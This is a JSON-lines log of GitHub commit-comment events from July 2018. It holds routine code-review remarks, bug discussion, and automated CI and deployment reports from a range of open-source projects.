{"id":"7951903043","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675308,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-11T18:41:13Z","updated_at":"2018-07-11T18:41:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:41:13Z"}
{"id":"7951903169","type":"CommitCommentEvent","actor":{"login":"issamarmas"},"repo":{"name":"issamarmas/pers"},"payload":{"comment":{"id":29675309,"position":null,"line":null,"path":null,"commit_id":"3a2e4464bdea115bc3d99338a48ff488f53ac201","created_at":"2018-07-11T18:41:15Z","updated_at":"2018-07-11T18:41:15Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-11T18:41:15Z"}
{"id":"7951903338","type":"CommitCommentEvent","actor":{"login":"LeeHowes"},"repo":{"name":"brycelelbach/executors"},"payload":{"comment":{"id":29675310,"position":25,"line":186,"path":"wording.md","commit_id":"68e5280238862de0bffde2209f3fa71a6026d2aa","created_at":"2018-07-11T18:41:17Z","updated_at":"2018-07-11T18:41:17Z","author_association":"NONE","body":"We would strongly argue that:\r\n\"Both r.value(val) and r.except(e) are well-formed.\"\r\n\r\nis necessary here."}},"created_at":"2018-07-11T18:41:17Z"}
{"id":"7951905484","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29675312,"position":null,"line":null,"path":null,"commit_id":"eae7e2da886031df29e97982c31094d3bc2ad45a","created_at":"2018-07-11T18:41:42Z","updated_at":"2018-07-11T18:41:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-337](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-337).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-337-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T18:41:42Z"}
{"id":"7951906920","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675314,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-11T18:42:00Z","updated_at":"2018-07-11T18:42:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:42:00Z"}
{"id":"7951908951","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675318,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-11T18:42:24Z","updated_at":"2018-07-11T18:42:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:42:24Z"}
{"id":"7951909328","type":"CommitCommentEvent","actor":{"login":"timogruetter"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29675319,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-11T18:42:28Z","updated_at":"2018-07-11T18:42:28Z","author_association":"NONE","body":"I know, but this bug has been fixed in April, and STS 3.9.5 was released in July (see https://spring.io/blog/2018/07/05/spring-tool-suite-3-9-5-released), just wondering why it is still there..."}},"created_at":"2018-07-11T18:42:28Z"}
{"id":"7951912975","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675328,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-11T18:43:12Z","updated_at":"2018-07-11T18:43:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:43:12Z"}
{"id":"7951914882","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675332,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-11T18:43:34Z","updated_at":"2018-07-11T18:43:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:43:34Z"}
{"id":"7951915455","type":"CommitCommentEvent","actor":{"login":"ticky"},"repo":{"name":"buildkite/elastic-ci-stack-for-aws"},"payload":{"comment":{"id":29675333,"position":null,"line":null,"path":null,"commit_id":"76cc6ae00a35c26091d50ead06172a445ce7f029","created_at":"2018-07-11T18:43:41Z","updated_at":"2018-07-11T18:43:41Z","author_association":"MEMBER","body":"✌🏼"}},"created_at":"2018-07-11T18:43:41Z"}
{"id":"7951917745","type":"CommitCommentEvent","actor":{"login":"carlislemc"},"repo":{"name":"picoCTF/picoCTF"},"payload":{"comment":{"id":29675338,"position":null,"line":null,"path":null,"commit_id":"415533e56094d1a3f3985feab78997943d62587d","created_at":"2018-07-11T18:44:08Z","updated_at":"2018-07-11T18:44:08Z","author_association":"COLLABORATOR","body":"This broke ecb1.py, an example problem, which was written in Python2, not Python3. @hiliang-cmu @maverickwoo . I tried just adding () to the print statements to fix, but then I get an error:\r\n\r\n  File \"/problems/ecb-1_1/ecb.py\", line 5, in <module>\r\n    from Crypto.Cipher import AES\r\nImportError: No module named 'Crypto'\r\n"}},"created_at":"2018-07-11T18:44:08Z"}
{"id":"7951919295","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675343,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-11T18:44:24Z","updated_at":"2018-07-11T18:44:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:44:24Z"}
{"id":"7951920751","type":"CommitCommentEvent","actor":{"login":"srowen"},"repo":{"name":"zxing/zxing"},"payload":{"comment":{"id":29675351,"position":null,"line":null,"path":null,"commit_id":"db5f3ac62cb7965ff323efb1688b0f5f5f152ab3","created_at":"2018-07-11T18:44:41Z","updated_at":"2018-07-11T18:44:41Z","author_association":"CONTRIBUTOR","body":"It's published in the snapshot repo: https://oss.sonatype.org/content/repositories/snapshots/com/google/zxing/core/3.3.4-SNAPSHOT/ But you are intended to build this locally too."}},"created_at":"2018-07-11T18:44:41Z"}
{"id":"7951920905","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675352,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-11T18:44:43Z","updated_at":"2018-07-11T18:44:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:44:43Z"}
{"id":"7951924560","type":"CommitCommentEvent","actor":{"login":"chenminjing1984"},"repo":{"name":"chenminjing1984/Text"},"payload":{"comment":{"id":29675361,"position":null,"line":null,"path":null,"commit_id":"96302fc1c151b65eeeba3e3d48325ca385c07514","created_at":"2018-07-11T18:45:28Z","updated_at":"2018-07-11T18:45:28Z","author_association":"OWNER","body":"add"}},"created_at":"2018-07-11T18:45:28Z"}
{"id":"7951925158","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675364,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-11T18:45:35Z","updated_at":"2018-07-11T18:45:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:45:35Z"}
{"id":"7951926908","type":"CommitCommentEvent","actor":{"login":"kdvolder"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29675372,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-11T18:45:57Z","updated_at":"2018-07-11T18:45:57Z","author_association":"MEMBER","body":"We don't know why. It will have to be investigated. All I know for sure is that if it is broken 3.9.5 the fix will be in 3.9.6 at the earliest because 3.9.5 is already released. \r\n\r\nAnyhow... thanks for bringing it to our attention."}},"created_at":"2018-07-11T18:45:57Z"}
{"id":"7951929945","type":"CommitCommentEvent","actor":{"login":"chenminjing1984"},"repo":{"name":"chenminjing1984/Text"},"payload":{"comment":{"id":29675379,"position":3,"line":3,"path":"README.md","commit_id":"96302fc1c151b65eeeba3e3d48325ca385c07514","created_at":"2018-07-11T18:46:36Z","updated_at":"2018-07-11T18:46:36Z","author_association":"OWNER","body":"dd"}},"created_at":"2018-07-11T18:46:36Z"}
{"id":"7951930561","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29675382,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-11T18:46:44Z","updated_at":"2018-07-11T18:46:44Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - Win64-Windows-7-VisualStudio-14: OK (2917 of 2926 tests passed, 16 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 13 tests had: EIO diffs.\n * 9 tests had: ESO big diffs.\n * 7 tests had: Table big diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 2 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T18:46:44Z"}
{"id":"7951931766","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29675383,"position":41,"line":41,"path":"modules/phase_field/include/kernels/ACInterfaceAnisotropy.h","commit_id":"0672729768c66a347e705cd16a26e3235081c25d","created_at":"2018-07-11T18:46:59Z","updated_at":"2018-07-11T18:46:59Z","author_association":"NONE","body":"This needs to be of type `RealGradient` instead of `Real` since you are including the gradient of the test function in the member function."}},"created_at":"2018-07-11T18:46:59Z"}
{"id":"7951933309","type":"CommitCommentEvent","actor":{"login":"remcoros"},"repo":{"name":"jbogard/MediatR"},"payload":{"comment":{"id":29675389,"position":15,"line":67,"path":"src/MediatR/Mediator.cs","commit_id":"d8c1942165b120f8fb7aa8e5446ffd90454204d6","created_at":"2018-07-11T18:47:19Z","updated_at":"2018-07-11T18:47:19Z","author_association":"CONTRIBUTOR","body":"ConfigureAwait ;-)"}},"created_at":"2018-07-11T18:47:19Z"}
{"id":"7951934109","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29675394,"position":null,"line":null,"path":null,"commit_id":"707b55eed4fc110d1508fa97f5944fb0cb26ad1e","created_at":"2018-07-11T18:47:29Z","updated_at":"2018-07-11T18:47:29Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-MacOS-10.9-clang: OK (2924 of 2930 tests passed, 26 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\nregression Test Summary\n * Passed: 618\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-707b55eed4fc110d1508fa97f5944fb0cb26ad1e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-707b55eed4fc110d1508fa97f5944fb0cb26ad1e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.8%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T18:47:29Z"}
{"id":"7951934553","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29675395,"position":null,"line":null,"path":null,"commit_id":"aaaeac39850f87f255febb7c6e4c35e5d62a4fa0","created_at":"2018-07-11T18:47:34Z","updated_at":"2018-07-11T18:47:34Z","author_association":"COLLABORATOR","body":"This code was more or less taken verbatim from the template code Scooter provided. Since we aren't using a single TaskFactory, I had to use the code three times over for the various \"props\" map variables. Made some changes to descriptions as appropriate for each type of plot."}},"created_at":"2018-07-11T18:47:34Z"}
{"id":"7951937191","type":"CommitCommentEvent","actor":{"login":"mborgerson"},"repo":{"name":"xqemu/xqemu"},"payload":{"comment":{"id":29675400,"position":47,"line":null,"path":"hw/xbox/nv2a/nv2a_psh.c","commit_id":"603b6f15f28753bddff941603868733d3138d263","created_at":"2018-07-11T18:48:09Z","updated_at":"2018-07-11T18:48:09Z","author_association":"MEMBER","body":"Agree, this change should be reversed. Side-effect of running clang-format."}},"created_at":"2018-07-11T18:48:09Z"}
{"id":"7951944202","type":"CommitCommentEvent","actor":{"login":"lbargaoanu"},"repo":{"name":"AutoMapper/AutoMapper"},"payload":{"comment":{"id":29675411,"position":30,"line":604,"path":"src/AutoMapper/Execution/TypeMapPlanBuilder.cs","commit_id":"923468efc39a233d3990afcb2737707b76a08bb6","created_at":"2018-07-11T18:49:34Z","updated_at":"2018-07-11T18:49:34Z","author_association":"MEMBER","body":"https://github.com/AutoMapper/AutoMapper/blob/8a4e0bcc3f0cbb2337fd5b99e44432b2f415cfae/src/AutoMapper/Execution/ExpressionBuilder.cs#L22"}},"created_at":"2018-07-11T18:49:34Z"}
{"id":"7951944449","type":"CommitCommentEvent","actor":{"login":"amitkumar-gep"},"repo":{"name":"amitkumar-gep/Project1"},"payload":{"comment":{"id":29675412,"position":null,"line":null,"path":null,"commit_id":"fa06f024076aad1e85d39b2c28b0b9d6c71630b7","created_at":"2018-07-11T18:49:36Z","updated_at":"2018-07-11T18:49:36Z","author_association":"OWNER","body":"rollback this change."}},"created_at":"2018-07-11T18:49:36Z"}
{"id":"7951946304","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29675417,"position":25,"line":302,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"0acc60e3775e67906dda785a3013726b1b6d1381","created_at":"2018-07-11T18:50:00Z","updated_at":"2018-07-11T18:50:00Z","author_association":"OWNER","body":"why ?"}},"created_at":"2018-07-11T18:50:00Z"}
{"id":"7951948133","type":"CommitCommentEvent","actor":{"login":"amitkumar-gep"},"repo":{"name":"amitkumar-gep/Project1"},"payload":{"comment":{"id":29675422,"position":null,"line":null,"path":null,"commit_id":"d3ba201a710aa14fe57f1b3ca91ec0ea29d0432b","created_at":"2018-07-11T18:50:23Z","updated_at":"2018-07-11T18:50:23Z","author_association":"OWNER","body":"rollback this change"}},"created_at":"2018-07-11T18:50:23Z"}
{"id":"7951948219","type":"CommitCommentEvent","actor":{"login":"timogruetter"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29675423,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-11T18:50:24Z","updated_at":"2018-07-11T18:50:24Z","author_association":"NONE","body":"Alright, thanks! \r\nBtw: is there already a release date for STS 4 ?\r\n"}},"created_at":"2018-07-11T18:50:24Z"}
{"id":"7951956863","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/nhmla"},"payload":{"comment":{"id":29675440,"position":null,"line":null,"path":null,"commit_id":"da4497594193fc21d568268cd7efd7b57fb9a090","created_at":"2018-07-11T18:52:09Z","updated_at":"2018-07-11T18:52:09Z","author_association":"MEMBER","body":"Created multidev environment [nhmla#ci-9](https://dashboard.pantheon.io/sites/5e274a0d-a22e-4c9c-95aa-12ce53d2efa6#ci-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-9-nhmla.pantheonsite.io/)"}},"created_at":"2018-07-11T18:52:09Z"}
{"id":"7951959235","type":"CommitCommentEvent","actor":{"login":"berry807"},"repo":{"name":"berry807/php-iban"},"payload":{"comment":{"id":29675444,"position":null,"line":null,"path":null,"commit_id":"eb3eac888d0c0a299134daf5b245ec48fa666be8","created_at":"2018-07-11T18:52:37Z","updated_at":"2018-07-11T18:52:37Z","author_association":"OWNER","body":"Omit the PHP closing tag"}},"created_at":"2018-07-11T18:52:37Z"}
{"id":"7951959383","type":"CommitCommentEvent","actor":{"login":"martinschroeder"},"repo":{"name":"concurrent-php/task"},"payload":{"comment":{"id":29675446,"position":5,"line":172,"path":"src/task_scheduler.c","commit_id":"21aff92d010847c87ab3a7c284f57c6658c038f0","created_at":"2018-07-11T18:52:39Z","updated_at":"2018-07-11T18:52:39Z","author_association":"MEMBER","body":"You might be expecting this because that is how it works in amp. I added that error because as of now this does not work for async tasks. Supporting this would require some changes to the fiber opcode handler because it needs to await the returned awaitable in the same fiber context."}},"created_at":"2018-07-11T18:52:39Z"}
{"id":"7951962126","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29675456,"position":null,"line":null,"path":null,"commit_id":"aaaeac39850f87f255febb7c6e4c35e5d62a4fa0","created_at":"2018-07-11T18:53:11Z","updated_at":"2018-07-11T18:53:11Z","author_association":"COLLABORATOR","body":"HTML/Plotly _still_ isn't actually popping up in the browser, unfortunately. I've added in variables for the other arguments necessitated by the cybrowser \"show\" command (according to the command line dialog), but I end up with what looks like the JS source code for a graph rather than the graph itself..."}},"created_at":"2018-07-11T18:53:11Z"}
{"id":"7951965095","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29675461,"position":9,"line":76,"path":"src/KeyboardPrefixSelectionMixin.js","commit_id":"4ff1514000d386e34d513e7685599b274a09fe5c","created_at":"2018-07-11T18:53:47Z","updated_at":"2018-07-11T18:53:47Z","author_association":"CONTRIBUTOR","body":"All the tests manually set `keyCode`, not `key`."}},"created_at":"2018-07-11T18:53:47Z"}
{"id":"7951966094","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29675462,"position":null,"line":null,"path":null,"commit_id":"362e15ad60809a15d5d1aad780327b7670f06bcf","created_at":"2018-07-11T18:53:59Z","updated_at":"2018-07-11T18:53:59Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T18:53:59Z"}
{"id":"7951967462","type":"CommitCommentEvent","actor":{"login":"LarryRuane"},"repo":{"name":"LarryRuane/protothread-multicore"},"payload":{"comment":{"id":29675465,"position":9,"line":14,"path":"protothread.c","commit_id":"dbf979230574b24979126a7cd84c0e690cfd947c","created_at":"2018-07-11T18:54:16Z","updated_at":"2018-07-11T18:54:16Z","author_association":"OWNER","body":"these just moved down to near the end of the file"}},"created_at":"2018-07-11T18:54:16Z"}
{"id":"7951967951","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29675467,"position":null,"line":null,"path":null,"commit_id":"5fbbfc0d9547805c123320c735d130937a801285","created_at":"2018-07-11T18:54:21Z","updated_at":"2018-07-11T18:54:21Z","author_association":"MEMBER","body":"point cloud file?"}},"created_at":"2018-07-11T18:54:21Z"}
{"id":"7951968377","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29675468,"position":null,"line":null,"path":null,"commit_id":"ef6eaf27274c0351f7059163918f3795da13199c","created_at":"2018-07-11T18:54:26Z","updated_at":"2018-07-11T18:54:26Z","author_association":"NONE","body":"thanks!"}},"created_at":"2018-07-11T18:54:26Z"}
{"id":"7951970266","type":"CommitCommentEvent","actor":{"login":"LarryRuane"},"repo":{"name":"LarryRuane/protothread-multicore"},"payload":{"comment":{"id":29675469,"position":84,"line":51,"path":"protothread.c","commit_id":"dbf979230574b24979126a7cd84c0e690cfd947c","created_at":"2018-07-11T18:54:50Z","updated_at":"2018-07-11T18:54:50Z","author_association":"OWNER","body":"moved down..."}},"created_at":"2018-07-11T18:54:50Z"}
{"id":"7951970593","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"linkerd/linkerd"},"payload":{"comment":{"id":29675470,"position":null,"line":null,"path":null,"commit_id":"2d57a0f52be66984ecd7b506d1a1f7d0ae24ee22","created_at":"2018-07-11T18:54:54Z","updated_at":"2018-07-11T18:54:54Z","author_association":"NONE","body":"might be nice to show an example of transparent use of B3 headers via this. I'm guessing that's the intent"}},"created_at":"2018-07-11T18:54:54Z"}
{"id":"7951972935","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29675474,"position":24,"line":90,"path":"src/KeyboardPrefixSelectionMixin.js","commit_id":"4ff1514000d386e34d513e7685599b274a09fe5c","created_at":"2018-07-11T18:55:21Z","updated_at":"2018-07-11T18:55:21Z","author_association":"CONTRIBUTOR","body":"I was actually just writing a test/issue/PR to request support for the space key in prefixes, otherwise selecting i.e. \"New Window\" in the [demo](https://component.kitchen/demos/menuButton.html) is impossible. Why exactly do you filter out the space key here?"}},"created_at":"2018-07-11T18:55:21Z"}
{"id":"7951980442","type":"CommitCommentEvent","actor":{"login":"JanMiksovsky"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29675494,"position":7,"line":86,"path":"src/KeyboardPrefixSelectionMixin.js","commit_id":"f661f73991a474eb612dc1aed8a3f5f0d654d5d9","created_at":"2018-07-11T18:56:49Z","updated_at":"2018-07-11T18:56:49Z","author_association":"MEMBER","body":"Removing the code to handle the Esc key was a mistake on my part when I was adapting KeyboardPrefixSelectionMixin for use in MenuButton. In that context, the Esc key should dismiss the menu, and hence should *not* be marked as handled by this mixin. So I'd removed the Esc key handling here.\r\n\r\nHowever, I'd overlooked the implications of the Esc key in regards to resetting the prefix. The Esc key gives the user a way to quickly override prefix typing if they don't want to wait for the usual 1 second timeout to pass. (Not sure whether any real user will ever notice that behavior, but I think Windows list boxes did — or used to do — this, so I've put the behavior in.)\r\n\r\nI've [restored](https://github.com/elix/elix/blob/006b56aa6897b075aeafc004e2883812ee5e7006/src/KeyboardPrefixSelectionMixin.js#L81) the handling for the Esc key to the KeyboardPrefixSelectionMixin. Since it's only the Esc key that resets the prefix, I've also taken the opportunity to inline the `resetTypedPrefix` call and drop the use of the `resetPrefix` flag.\r\n\r\nThanks for spotting this."}},"created_at":"2018-07-11T18:56:49Z"}
